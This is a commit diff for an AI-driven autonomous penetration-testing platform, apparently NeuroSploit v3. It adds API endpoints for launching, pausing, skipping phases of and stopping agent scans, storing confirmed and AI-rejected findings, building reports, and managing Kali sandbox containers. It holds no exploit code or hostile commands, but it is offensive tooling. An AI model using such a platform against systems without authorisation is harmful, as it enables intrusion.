Add files via upload

This commit is contained in:
Joas A Santos
2026-02-11 10:47:33 -03:00
committed by GitHub
parent e32573a950
commit 30acd5afc7
52 changed files with 22492 additions and 706 deletions
+91
View File
@@ -47,6 +47,35 @@ class BaseAgent:
self.interesting_findings = []
self.tool_history = []
# Knowledge augmentation (opt-in via env)
self.augmentor = None
if os.getenv('ENABLE_KNOWLEDGE_AUGMENTATION', 'false').lower() == 'true':
try:
from core.knowledge_augmentor import KnowledgeAugmentor
ka_config = config.get('knowledge_augmentation', {})
self.augmentor = KnowledgeAugmentor(
dataset_path=ka_config.get('dataset_path', 'models/bug-bounty/bugbounty_finetuning_dataset.json'),
max_patterns=ka_config.get('max_patterns_per_query', 3)
)
logger.info("Knowledge augmentation enabled")
except Exception as e:
logger.warning(f"Knowledge augmentation init failed: {e}")
# MCP tool client (opt-in via config)
self.mcp_client = None
if config.get('mcp_servers', {}).get('enabled', False):
try:
from core.mcp_client import MCPToolClient
self.mcp_client = MCPToolClient(config)
logger.info("MCP tool client enabled")
except Exception as e:
logger.warning(f"MCP client init failed: {e}")
# Browser validation (opt-in via env)
self.browser_validation_enabled = (
os.getenv('ENABLE_BROWSER_VALIDATION', 'false').lower() == 'true'
)
logger.info(f"Initialized {self.agent_name} - Autonomous Agent")
def _extract_targets(self, user_input: str) -> List[str]:
@@ -131,6 +160,68 @@ class BaseAgent:
self.tool_history.append(result)
return result
def run_mcp_tool(self, tool_name: str, arguments: Optional[Dict] = None) -> Optional[str]:
    """Run *tool_name* through the MCP client when one is configured.

    Returns the tool's textual output on success, or None when MCP is
    disabled/unavailable so the caller can fall back to a subprocess run.
    """
    client = self.mcp_client
    if not client or not client.enabled:
        return None
    import asyncio
    try:
        output = asyncio.run(client.try_tool(tool_name, arguments))
    except Exception as e:
        # Missing tool is expected; log quietly and let the caller fall back.
        logger.debug(f"MCP tool '{tool_name}' not available: {e}")
        return None
    if output is None:
        return None
    logger.info(f"MCP tool executed: {tool_name}")
    return output
def run_browser_validation(self, finding_id: str, url: str,
                           payload: Optional[str] = None) -> Dict:
    """Validate a finding using Playwright browser.

    Only executes if ENABLE_BROWSER_VALIDATION is set (checked at init via
    self.browser_validation_enabled); otherwise returns a "skipped" marker.
    Returns validation result with screenshots on success, or a dict with
    an "error" key if validation raises.
    """
    if not self.browser_validation_enabled:
        return {"skipped": True, "reason": "Browser validation disabled"}
    try:
        # Imported lazily so Playwright is only required when enabled.
        from core.browser_validator import validate_finding_sync
        screenshots_dir = self.config.get('browser_validation', {}).get(
            'screenshots_dir', 'reports/screenshots'
        )
        # Screenshots are namespaced per agent to avoid cross-agent clobbering.
        return validate_finding_sync(
            finding_id=finding_id,
            url=url,
            payload=payload,
            screenshots_dir=f"{screenshots_dir}/{self.agent_name}",
            headless=self.config.get('browser_validation', {}).get('headless', True)
        )
    except Exception as e:
        # Validation is best-effort: report the failure instead of raising.
        logger.error(f"Browser validation failed for {finding_id}: {e}")
        return {"finding_id": finding_id, "error": str(e)}
def get_augmented_context(self, vulnerability_types: List[str]) -> str:
    """Build knowledge-augmentation context for the given vulnerability types.

    Returns a formatted pattern string to inject into prompts, or an empty
    string when augmentation is disabled.
    """
    if not self.augmentor:
        return ""
    detected_tech = list(self.tech_stack.get('detected', []))
    chunks = []
    # Cap at three types to keep the injected prompt context small.
    for vuln_type in vulnerability_types[:3]:
        block = self.augmentor.get_relevant_patterns(
            vulnerability_type=vuln_type,
            technologies=detected_tech,
        )
        if block:
            chunks.append(block)
    return "".join(chunks)
def execute(self, user_input: str, campaign_data: Dict = None, recon_context: Dict = None) -> Dict:
"""
Execute security assessment.
+327 -36
View File
@@ -32,6 +32,8 @@ agent_instances: Dict[str, AutonomousAgent] = {}
# Map agent_id to scan_id for database persistence
agent_to_scan: Dict[str, str] = {}
# Reverse map: scan_id to agent_id for ScanDetailsPage lookups
scan_to_agent: Dict[str, str] = {}
@router.get("/status")
@@ -101,6 +103,7 @@ class AgentMode(str, Enum):
RECON_ONLY = "recon_only" # Just reconnaissance
PROMPT_ONLY = "prompt_only" # AI decides (high tokens)
ANALYZE_ONLY = "analyze_only" # Analysis without testing
AUTO_PENTEST = "auto_pentest" # One-click full auto pentest
class AgentRequest(BaseModel):
@@ -113,6 +116,8 @@ class AgentRequest(BaseModel):
auth_value: Optional[str] = Field(None, description="Auth value (cookie string, token, etc)")
custom_headers: Optional[Dict[str, str]] = Field(None, description="Custom HTTP headers")
max_depth: int = Field(5, description="Maximum crawl depth")
subdomain_discovery: bool = Field(False, description="Enable subdomain discovery (auto_pentest mode)")
targets: Optional[List[str]] = Field(None, description="Multiple targets (auto_pentest mode)")
class AgentResponse(BaseModel):
@@ -193,7 +198,9 @@ async def run_agent(request: AgentRequest, background_tasks: BackgroundTasks):
"findings": [],
"report": None,
"progress": 0,
"phase": "initializing"
"phase": "initializing",
"rejected_findings": [],
"rejected_findings_count": 0,
}
# Run agent in background
@@ -212,7 +219,8 @@ async def run_agent(request: AgentRequest, background_tasks: BackgroundTasks):
"full_auto": "Full autonomous pentest: Recon -> Analyze -> Test -> Report",
"recon_only": "Reconnaissance only, no vulnerability testing",
"prompt_only": "AI decides everything (high token usage!)",
"analyze_only": "Analysis only, no active testing"
"analyze_only": "Analysis only, no active testing",
"auto_pentest": "One-click auto pentest: Full recon + 100 vuln types + AI report"
}
return AgentResponse(
@@ -255,12 +263,20 @@ async def _run_agent_task(
agent_results[agent_id]["progress"] = progress
agent_results[agent_id]["phase"] = phase
rejected_findings_list = []
async def finding_callback(finding: Dict):
"""Real-time finding callback - updates in-memory storage immediately"""
findings_list.append(finding)
if agent_id in agent_results:
agent_results[agent_id]["findings"] = findings_list
agent_results[agent_id]["findings_count"] = len(findings_list)
if finding.get("ai_status") == "rejected":
rejected_findings_list.append(finding)
if agent_id in agent_results:
agent_results[agent_id]["rejected_findings"] = rejected_findings_list
agent_results[agent_id]["rejected_findings_count"] = len(rejected_findings_list)
else:
findings_list.append(finding)
if agent_id in agent_results:
agent_results[agent_id]["findings"] = findings_list
agent_results[agent_id]["findings_count"] = len(findings_list)
try:
# Create database session and scan record
@@ -289,8 +305,9 @@ async def _run_agent_task(
db.add(target_record)
await db.commit()
# Store mapping
# Store mapping (both directions)
agent_to_scan[agent_id] = scan_id
scan_to_agent[scan_id] = agent_id
agent_results[agent_id]["scan_id"] = scan_id
# Map mode
@@ -299,6 +316,7 @@ async def _run_agent_task(
AgentMode.RECON_ONLY: OperationMode.RECON_ONLY,
AgentMode.PROMPT_ONLY: OperationMode.PROMPT_ONLY,
AgentMode.ANALYZE_ONLY: OperationMode.ANALYZE_ONLY,
AgentMode.AUTO_PENTEST: OperationMode.AUTO_PENTEST,
}
op_mode = mode_map.get(mode, OperationMode.FULL_AUTO)
@@ -311,6 +329,7 @@ async def _run_agent_task(
task=task,
custom_prompt=custom_prompt or (task.prompt if task else None),
finding_callback=finding_callback,
scan_id=str(scan_id),
) as agent:
# Store agent instance for stop functionality
agent_instances[agent_id] = agent
@@ -345,7 +364,41 @@ async def _run_agent_task(
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
ai_analysis=finding.get("ai_analysis", finding.get("exploitation_steps", ""))
ai_analysis=finding.get("ai_analysis", finding.get("exploitation_steps", "")),
poc_code=finding.get("poc_code", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
validation_status="ai_confirmed",
)
db.add(vuln)
# Save rejected findings to database for manual review
for finding in report.get("rejected_findings", []):
vuln = Vulnerability(
scan_id=scan_id,
title=finding.get("title", finding.get("type", "Unknown")),
vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
severity=finding.get("severity", "medium").lower(),
cvss_score=finding.get("cvss_score"),
cvss_vector=finding.get("cvss_vector"),
cwe_id=finding.get("cwe_id"),
description=finding.get("description", finding.get("evidence", "")),
affected_endpoint=finding.get("affected_endpoint", finding.get("endpoint", finding.get("url", target))),
poc_payload=finding.get("payload", finding.get("poc_payload", "")),
poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
poc_code=finding.get("poc_code", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
validation_status="ai_rejected",
ai_rejection_reason=finding.get("rejection_reason", ""),
)
db.add(vuln)
@@ -402,6 +455,7 @@ async def _run_agent_task(
agent_results[agent_id]["report"] = report
agent_results[agent_id]["report_id"] = report_record.id
agent_results[agent_id]["findings"] = findings
agent_results[agent_id]["tool_executions"] = report.get("tool_executions", [])
agent_results[agent_id]["progress"] = 100
agent_results[agent_id]["phase"] = "completed"
@@ -429,6 +483,37 @@ async def _run_agent_task(
pass
@router.get("/by-scan/{scan_id}")
async def get_agent_by_scan(scan_id: str):
    """Look up agent status by scan_id (reverse lookup for ScanDetailsPage)."""
    agent_id = scan_to_agent.get(scan_id)
    if not agent_id:
        raise HTTPException(status_code=404, detail="No agent found for this scan")
    if agent_id not in agent_results:
        # Mapping exists but the in-memory result was evicted (e.g. restart).
        raise HTTPException(status_code=404, detail="Agent data no longer in memory")
    result = agent_results[agent_id]
    findings = result.get("findings", [])
    rejected = result.get("rejected_findings", [])
    return {
        "agent_id": agent_id,
        "scan_id": scan_id,
        "status": result["status"],
        "mode": result.get("mode", "full_auto"),
        "target": result["target"],
        "progress": result.get("progress", 0),
        "phase": result.get("phase", "unknown"),
        "started_at": result.get("started_at"),
        "completed_at": result.get("completed_at"),
        "findings_count": len(findings),
        "findings": findings,
        "rejected_findings_count": len(rejected),
        "rejected_findings": rejected,
        "logs_count": len(result.get("logs", [])),
        "report": result.get("report"),
        "error": result.get("error")
    }
@router.get("/status/{agent_id}")
async def get_agent_status(agent_id: str):
"""Get the status and results of an agent run - with database fallback"""
@@ -449,6 +534,8 @@ async def get_agent_status(agent_id: str):
"logs_count": len(result.get("logs", [])),
"findings_count": len(result.get("findings", [])),
"findings": result.get("findings", []),
"rejected_findings_count": len(result.get("rejected_findings", [])),
"rejected_findings": result.get("rejected_findings", []),
"report": result.get("report"),
"error": result.get("error")
}
@@ -495,10 +582,12 @@ async def _get_status_from_db(agent_id: str, scan_id: str):
"evidence": getattr(v, 'poc_evidence', None) or "",
"request": v.poc_request or "",
"response": v.poc_response or "",
"poc_code": v.poc_payload or "",
"poc_code": getattr(v, 'poc_code', None) or v.poc_payload or "",
"impact": v.impact or "",
"remediation": v.remediation or "",
"references": v.references or [],
"screenshots": getattr(v, 'screenshots', None) or [],
"url": getattr(v, 'url', None) or v.affected_endpoint or "",
"ai_verified": True,
"confidence": "high"
}
@@ -542,14 +631,14 @@ async def _get_status_from_db(agent_id: str, scan_id: str):
@router.post("/stop/{agent_id}")
async def stop_agent(agent_id: str):
"""Stop a running agent scan and auto-generate report"""
"""Stop a running agent scan, save all findings to DB, and generate report."""
if agent_id not in agent_results:
raise HTTPException(status_code=404, detail="Agent not found")
if agent_results[agent_id]["status"] != "running":
return {"message": "Agent is not running", "status": agent_results[agent_id]["status"]}
# Cancel the agent
# Cancel the agent immediately
if agent_id in agent_instances:
agent_instances[agent_id].cancel()
@@ -558,9 +647,10 @@ async def stop_agent(agent_id: str):
agent_results[agent_id]["phase"] = "stopped"
agent_results[agent_id]["completed_at"] = datetime.utcnow().isoformat()
# Update database and auto-generate report
# Update database: save findings + generate report
scan_id = agent_to_scan.get(agent_id)
report_id = None
target = agent_results[agent_id].get("target", "Unknown")
if scan_id:
try:
@@ -573,47 +663,222 @@ async def stop_agent(agent_id: str):
scan.status = "stopped"
scan.completed_at = datetime.utcnow()
# Get findings count
# Save confirmed findings to DB (same as completion flow)
findings = agent_results[agent_id].get("findings", [])
scan.total_vulnerabilities = len(findings)
severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
# Count severities
for finding in findings:
severity = finding.get("severity", "").lower()
if severity == "critical":
scan.critical_count = (scan.critical_count or 0) + 1
elif severity == "high":
scan.high_count = (scan.high_count or 0) + 1
elif severity == "medium":
scan.medium_count = (scan.medium_count or 0) + 1
elif severity == "low":
scan.low_count = (scan.low_count or 0) + 1
elif severity == "info":
scan.info_count = (scan.info_count or 0) + 1
severity = finding.get("severity", "medium").lower()
if severity in severity_counts:
severity_counts[severity] += 1
vuln = Vulnerability(
scan_id=scan_id,
title=finding.get("title", finding.get("type", "Unknown")),
vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
severity=severity,
cvss_score=finding.get("cvss_score"),
cvss_vector=finding.get("cvss_vector"),
cwe_id=finding.get("cwe_id"),
description=finding.get("description", finding.get("evidence", "")),
affected_endpoint=finding.get("affected_endpoint", finding.get("endpoint", finding.get("url", target))),
poc_payload=finding.get("payload", finding.get("poc_payload", "")),
poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
ai_analysis=finding.get("ai_analysis", finding.get("exploitation_steps", "")),
poc_code=finding.get("poc_code", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
validation_status="ai_confirmed",
)
db.add(vuln)
# Save rejected findings to DB for manual review
rejected = agent_results[agent_id].get("rejected_findings", [])
for finding in rejected:
vuln = Vulnerability(
scan_id=scan_id,
title=finding.get("title", finding.get("type", "Unknown")),
vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
severity=finding.get("severity", "medium").lower(),
cvss_score=finding.get("cvss_score"),
cvss_vector=finding.get("cvss_vector"),
cwe_id=finding.get("cwe_id"),
description=finding.get("description", finding.get("evidence", "")),
affected_endpoint=finding.get("affected_endpoint", finding.get("endpoint", finding.get("url", target))),
poc_payload=finding.get("payload", finding.get("poc_payload", "")),
poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
poc_code=finding.get("poc_code", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
validation_status="ai_rejected",
ai_rejection_reason=finding.get("rejection_reason", ""),
)
db.add(vuln)
# Update scan counts (confirmed only)
scan.total_vulnerabilities = len(findings)
scan.critical_count = severity_counts["critical"]
scan.high_count = severity_counts["high"]
scan.medium_count = severity_counts["medium"]
scan.low_count = severity_counts["low"]
scan.info_count = severity_counts["info"]
await db.commit()
# Auto-generate report
report = Report(
# Auto-generate report record
report_record = Report(
scan_id=scan_id,
title=f"Agent Scan Report - {agent_results[agent_id].get('target', 'Unknown')}",
title=f"Agent Scan Report - {target}",
format="json",
executive_summary=f"Automated security scan completed with {len(findings)} findings."
executive_summary=f"Security scan stopped with {len(findings)} confirmed and {len(rejected)} rejected findings."
)
db.add(report)
db.add(report_record)
await db.commit()
await db.refresh(report)
report_id = report.id
await db.refresh(report_record)
report_id = report_record.id
except Exception as e:
print(f"Error updating scan status: {e}")
print(f"Error updating scan status on stop: {e}")
import traceback
traceback.print_exc()
return {
"message": "Agent stopped successfully",
"agent_id": agent_id,
"report_id": report_id
"report_id": report_id,
"findings_saved": len(agent_results[agent_id].get("findings", [])),
"rejected_saved": len(agent_results[agent_id].get("rejected_findings", [])),
}
@router.post("/pause/{agent_id}")
async def pause_agent(agent_id: str):
    """Pause a running agent scan."""
    if agent_id not in agent_results:
        raise HTTPException(status_code=404, detail="Agent not found")
    state = agent_results[agent_id]
    if state["status"] != "running":
        return {"message": "Agent is not running", "status": state["status"]}
    instance = agent_instances.get(agent_id)
    if instance is not None:
        instance.pause()
    # Remember the in-flight phase so resume can restore it.
    state["last_phase"] = state.get("phase", "recon")
    state["status"] = "paused"
    state["phase"] = "paused"
    return {"message": "Agent paused", "agent_id": agent_id}
@router.post("/resume/{agent_id}")
async def resume_agent(agent_id: str):
    """Resume a paused agent scan."""
    if agent_id not in agent_results:
        raise HTTPException(status_code=404, detail="Agent not found")
    state = agent_results[agent_id]
    if state["status"] != "paused":
        return {"message": "Agent is not paused", "status": state["status"]}
    instance = agent_instances.get(agent_id)
    if instance is not None:
        instance.resume()
    state["status"] = "running"
    # Restore the phase that was active before pause.
    state["phase"] = state.get("last_phase", "testing")
    return {"message": "Agent resumed", "agent_id": agent_id}
# Canonical, ordered list of agent phases. skip_agent_phase uses the index
# in this list to enforce forward-only skips.
AGENT_PHASE_ORDER = ["recon", "analysis", "testing", "enhancement", "completed"]

# Map free-form status strings (as written into agent_results["phase"]) to
# canonical phase keys from AGENT_PHASE_ORDER. Strings not listed here fall
# through to a substring match against the canonical keys.
PHASE_NORMALIZE = {
    "starting reconnaissance": "recon",
    "reconnaissance complete": "recon",
    "initial probe complete": "recon",
    "endpoint discovery complete": "recon",
    "parameter discovery complete": "recon",
    "attack surface analyzed": "analysis",
    "vulnerability testing complete": "testing",
    "findings enhanced": "enhancement",
    "assessment complete": "completed",
}
@router.post("/skip-to/{agent_id}/{target_phase}")
async def skip_agent_phase(agent_id: str, target_phase: str):
    """Skip the current agent phase and jump to a target phase.

    Valid phases: recon, analysis, testing, enhancement, completed
    Can only skip forward (to a phase ahead of current). If the agent is
    paused it is resumed first so the skip signal can be processed.
    """
    if agent_id not in agent_results:
        raise HTTPException(status_code=404, detail="Agent not found")
    agent_status = agent_results[agent_id]["status"]
    if agent_status not in ("running", "paused"):
        raise HTTPException(status_code=400, detail="Agent is not running or paused")
    if target_phase not in AGENT_PHASE_ORDER:
        raise HTTPException(
            status_code=400,
            detail=f"Invalid phase '{target_phase}'. Valid: {', '.join(AGENT_PHASE_ORDER[1:])}"
        )
    # Get current phase and normalize it to a canonical AGENT_PHASE_ORDER key.
    current_raw = agent_results[agent_id].get("phase", "").lower()
    # Handle "paused"/"stopped" phase — use the last known non-paused phase,
    # defaulting to recon (set by pause_agent as "last_phase").
    if current_raw in ("paused", "stopped"):
        current_raw = agent_results[agent_id].get("last_phase", "recon")
    current_phase = PHASE_NORMALIZE.get(current_raw, current_raw)
    # Also try substring match against canonical keys for status strings not
    # covered by PHASE_NORMALIZE (e.g. "testing xss payloads").
    for key in AGENT_PHASE_ORDER:
        if key in current_phase:
            current_phase = key
            break
    # Unrecognized phases are treated as "recon" (index 0) so any forward
    # target is allowed.
    cur_idx = AGENT_PHASE_ORDER.index(current_phase) if current_phase in AGENT_PHASE_ORDER else 0
    tgt_idx = AGENT_PHASE_ORDER.index(target_phase)
    if tgt_idx <= cur_idx:
        raise HTTPException(
            status_code=400,
            detail=f"Cannot skip backward. Current: {current_phase}, target: {target_phase}"
        )
    # Signal the agent instance to skip.
    if agent_id in agent_instances:
        # If paused, resume first so the skip can be processed.
        if agent_status == "paused":
            agent_instances[agent_id].resume()
            agent_results[agent_id]["status"] = "running"
        success = agent_instances[agent_id].skip_to_phase(target_phase)
        if not success:
            raise HTTPException(status_code=500, detail="Failed to signal phase skip")
    else:
        raise HTTPException(status_code=400, detail="Agent instance not available for signaling")
    return {
        "message": f"Skipping to phase: {target_phase}",
        "agent_id": agent_id,
        "from_phase": current_phase,
        "target_phase": target_phase
    }
@@ -1711,7 +1976,10 @@ async def _save_realtime_findings_to_db(session_id: str, session: Dict):
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
ai_analysis=f"Identified during realtime session {session_id}"
ai_analysis=f"Identified during realtime session {session_id}",
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", "")
)
db.add(vuln)
@@ -1809,6 +2077,29 @@ async def generate_realtime_report(session_id: str, format: str = "json"):
scan_results=tool_results
)
# Save to a per-report folder with screenshots
import shutil
from pathlib import Path
timestamp = datetime.utcnow().strftime("%Y%m%d_%H%M%S")
target_name = session["target"].replace("://", "_").replace("/", "_").rstrip("_")[:40]
report_dir = Path("reports") / f"report_{target_name}_{timestamp}"
report_dir.mkdir(parents=True, exist_ok=True)
(report_dir / f"report_{timestamp}.html").write_text(html_content)
# Copy screenshots into report folder
screenshots_src = Path("reports") / "screenshots"
if screenshots_src.exists():
screenshots_dest = report_dir / "screenshots"
for finding in findings:
fid = finding.get("id", "")
if fid:
src_dir = screenshots_src / str(fid)
if src_dir.exists():
dest_dir = screenshots_dest / str(fid)
dest_dir.mkdir(parents=True, exist_ok=True)
for ss_file in src_dir.glob("*.png"):
shutil.copy2(ss_file, dest_dir / ss_file.name)
return HTMLResponse(content=html_content, media_type="text/html")
return {
+166 -1
View File
@@ -64,6 +64,19 @@ async def generate_report(
)
vulnerabilities = vulns_result.scalars().all()
# Try to get tool_executions from agent in-memory results
tool_executions = []
try:
from backend.api.v1.agent import scan_to_agent, agent_results
agent_id = scan_to_agent.get(report_data.scan_id)
if agent_id and agent_id in agent_results:
tool_executions = agent_results[agent_id].get("tool_executions", [])
if not tool_executions:
rpt = agent_results[agent_id].get("report", {})
tool_executions = rpt.get("tool_executions", []) if isinstance(rpt, dict) else []
except Exception:
pass
# Generate report
generator = ReportGenerator()
report_path, executive_summary = await generator.generate(
@@ -73,7 +86,8 @@ async def generate_report(
title=report_data.title,
include_executive_summary=report_data.include_executive_summary,
include_poc=report_data.include_poc,
include_remediation=report_data.include_remediation
include_remediation=report_data.include_remediation,
tool_executions=tool_executions,
)
# Save report record
@@ -91,6 +105,63 @@ async def generate_report(
return ReportResponse(**report.to_dict())
@router.post("/ai-generate", response_model=ReportResponse)
async def generate_ai_report(
    report_data: ReportGenerate,
    db: AsyncSession = Depends(get_db)
):
    """Generate an AI-enhanced report with LLM-written executive summary and per-finding analysis.

    Loads the scan and its vulnerabilities from the DB, opportunistically
    pulls tool execution history from the agent's in-memory state, renders
    the report via ReportGenerator.generate_ai_report, and persists a
    Report record pointing at the generated file.
    """
    # Get scan
    scan_result = await db.execute(select(Scan).where(Scan.id == report_data.scan_id))
    scan = scan_result.scalar_one_or_none()
    if not scan:
        raise HTTPException(status_code=404, detail="Scan not found")
    # Get vulnerabilities
    vulns_result = await db.execute(
        select(Vulnerability).where(Vulnerability.scan_id == report_data.scan_id)
    )
    vulnerabilities = vulns_result.scalars().all()
    # Try to get tool_executions from agent in-memory results. Best-effort:
    # the agent module maps scan_id -> agent_id -> in-memory results, which
    # only exist while the process that ran the agent is still alive.
    tool_executions = []
    try:
        from backend.api.v1.agent import scan_to_agent, agent_results
        agent_id = scan_to_agent.get(report_data.scan_id)
        if agent_id and agent_id in agent_results:
            tool_executions = agent_results[agent_id].get("tool_executions", [])
            # Also check nested report
            if not tool_executions:
                rpt = agent_results[agent_id].get("report", {})
                tool_executions = rpt.get("tool_executions", []) if isinstance(rpt, dict) else []
    except Exception:
        # Missing agent state is fine; the report just omits tool history.
        pass
    # Generate AI report
    generator = ReportGenerator()
    report_path, ai_summary = await generator.generate_ai_report(
        scan=scan,
        vulnerabilities=vulnerabilities,
        tool_executions=tool_executions,
        title=report_data.title,
    )
    # Save report record; summary is truncated to fit the column width.
    report = Report(
        scan_id=scan.id,
        title=report_data.title or f"AI Report - {scan.name}",
        format="html",
        file_path=str(report_path),
        executive_summary=ai_summary[:2000] if ai_summary else None
    )
    db.add(report)
    await db.commit()
    await db.refresh(report)
    return ReportResponse(**report.to_dict())
@router.get("/{report_id}", response_model=ReportResponse)
async def get_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""Get report details"""
@@ -187,6 +258,100 @@ async def download_report(
)
@router.get("/{report_id}/download-zip")
async def download_report_zip(
    report_id: str,
    db: AsyncSession = Depends(get_db)
):
    """Download report as ZIP with screenshots included.

    Regenerates the HTML report for the scan, gathers on-disk and DB-stored
    screenshots per vulnerability, and streams a ZIP containing
    "report.html" plus "screenshots/{finding_id}/*.png".
    """
    import zipfile
    import tempfile
    import hashlib
    result = await db.execute(select(Report).where(Report.id == report_id))
    report = result.scalar_one_or_none()
    if not report:
        raise HTTPException(status_code=404, detail="Report not found")
    scan_result = await db.execute(select(Scan).where(Scan.id == report.scan_id))
    scan = scan_result.scalar_one_or_none()
    if not scan:
        raise HTTPException(status_code=404, detail="Scan not found for report")
    vulns_result = await db.execute(
        select(Vulnerability).where(Vulnerability.scan_id == report.scan_id)
    )
    vulnerabilities = vulns_result.scalars().all()
    # Generate HTML report (fresh render; the stored file_path is not reused)
    generator = ReportGenerator()
    report_path, _ = await generator.generate(
        scan=scan,
        vulnerabilities=vulnerabilities,
        format="html",
        title=report.title
    )
    # Collect screenshots (use absolute path via settings.BASE_DIR)
    # Check scan-scoped path first, then legacy flat path
    screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
    scan_id_str = str(scan.id) if scan else None
    screenshot_files = []
    for vuln in vulnerabilities:
        # Finding ID is md5(vuln_type+url+param)[:8] — NOTE(review): this
        # must stay in sync with however the agent names screenshot dirs.
        vuln_url = getattr(vuln, 'url', None) or vuln.affected_endpoint or ''
        vuln_param = getattr(vuln, 'parameter', None) or getattr(vuln, 'poc_parameter', None) or ''
        finding_id = hashlib.md5(
            f"{vuln.vulnerability_type}{vuln_url}{vuln_param}".encode()
        ).hexdigest()[:8]
        # Scan-scoped path: reports/screenshots/{scan_id}/{finding_id}/
        finding_dir = None
        if scan_id_str:
            scan_dir = screenshots_base / scan_id_str / finding_id
            if scan_dir.exists():
                finding_dir = scan_dir
        if not finding_dir:
            # Legacy flat layout: reports/screenshots/{finding_id}/
            legacy_dir = screenshots_base / finding_id
            if legacy_dir.exists():
                finding_dir = legacy_dir
        if finding_dir:
            for img in finding_dir.glob("*.png"):
                screenshot_files.append((img, f"screenshots/{finding_id}/{img.name}"))
        # Also include base64 screenshots from DB as files in the ZIP
        db_screenshots = getattr(vuln, 'screenshots', None) or []
        for idx, ss in enumerate(db_screenshots):
            if isinstance(ss, str) and ss.startswith("data:image/"):
                # Will be embedded in HTML, but also save as file
                import base64 as b64
                try:
                    b64_data = ss.split(",", 1)[1]
                    img_bytes = b64.b64decode(b64_data)
                    img_name = f"screenshots/{finding_id}/evidence_{idx+1}.png"
                    # Write to temp for ZIP inclusion. NOTE(review): temp
                    # files are not deleted afterwards — presumably relies
                    # on OS temp cleanup; confirm acceptable.
                    tmp_img = Path(tempfile.gettempdir()) / f"ss_{finding_id}_{idx}.png"
                    tmp_img.write_bytes(img_bytes)
                    screenshot_files.append((tmp_img, img_name))
                except Exception:
                    # Malformed base64 entries are skipped silently.
                    pass
    # Create ZIP in the temp dir, named after the generated report file.
    zip_name = Path(report_path).stem + ".zip"
    zip_path = Path(tempfile.gettempdir()) / zip_name
    with zipfile.ZipFile(str(zip_path), 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.write(report_path, "report.html")
        for src_path, arc_name in screenshot_files:
            zf.write(str(src_path), arc_name)
    return FileResponse(
        path=str(zip_path),
        media_type="application/zip",
        filename=zip_name
    )
@router.delete("/{report_id}")
async def delete_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""Delete a report"""
+130
View File
@@ -0,0 +1,130 @@
"""
NeuroSploit v3 - Sandbox Container Management API
Real-time monitoring and management of per-scan Kali Linux containers.
"""
from datetime import datetime
from fastapi import APIRouter, HTTPException
router = APIRouter()
def _docker_available() -> bool:
try:
import docker
docker.from_env().ping()
return True
except Exception:
return False
@router.get("/")
async def list_sandboxes():
    """List all sandbox containers with pool status."""
    try:
        from core.container_pool import get_pool
        pool = get_pool()
    except Exception as e:
        # Pool unavailable (e.g. Docker not installed): report empty state.
        return {
            "pool": {
                "active": 0,
                "max_concurrent": 0,
                "image": "neurosploit-kali:latest",
                "container_ttl_minutes": 60,
                "docker_available": _docker_available(),
            },
            "containers": [],
            "error": str(e),
        }
    now = datetime.utcnow()

    def _uptime_seconds(meta):
        # Best-effort uptime from the stored ISO creation timestamp.
        stamp = meta.get("created_at")
        if not stamp:
            return 0.0
        try:
            return (now - datetime.fromisoformat(stamp)).total_seconds()
        except Exception:
            return 0.0

    containers = [
        {**meta, "uptime_seconds": _uptime_seconds(meta)}
        for meta in pool.list_sandboxes().values()
    ]
    return {
        "pool": {
            "active": pool.active_count,
            "max_concurrent": pool.max_concurrent,
            "image": pool.image,
            "container_ttl_minutes": int(pool.container_ttl.total_seconds() / 60),
            "docker_available": _docker_available(),
        },
        "containers": containers,
    }
@router.get("/{scan_id}")
async def get_sandbox(scan_id: str):
    """Get health check for a specific sandbox container."""
    try:
        from core.container_pool import get_pool
        pool = get_pool()
    except Exception as e:
        raise HTTPException(status_code=503, detail=str(e))
    if scan_id not in pool.list_sandboxes():
        raise HTTPException(status_code=404, detail=f"No sandbox for scan {scan_id}")
    # Reach into the pool's private map for the live sandbox instance.
    instance = pool._sandboxes.get(scan_id)
    if not instance:
        raise HTTPException(status_code=404, detail=f"Sandbox instance not found")
    return await instance.health_check()
@router.delete("/{scan_id}")
async def destroy_sandbox(scan_id: str):
    """Destroy a specific sandbox container."""
    try:
        from core.container_pool import get_pool
        pool = get_pool()
    except Exception as e:
        raise HTTPException(status_code=503, detail=str(e))
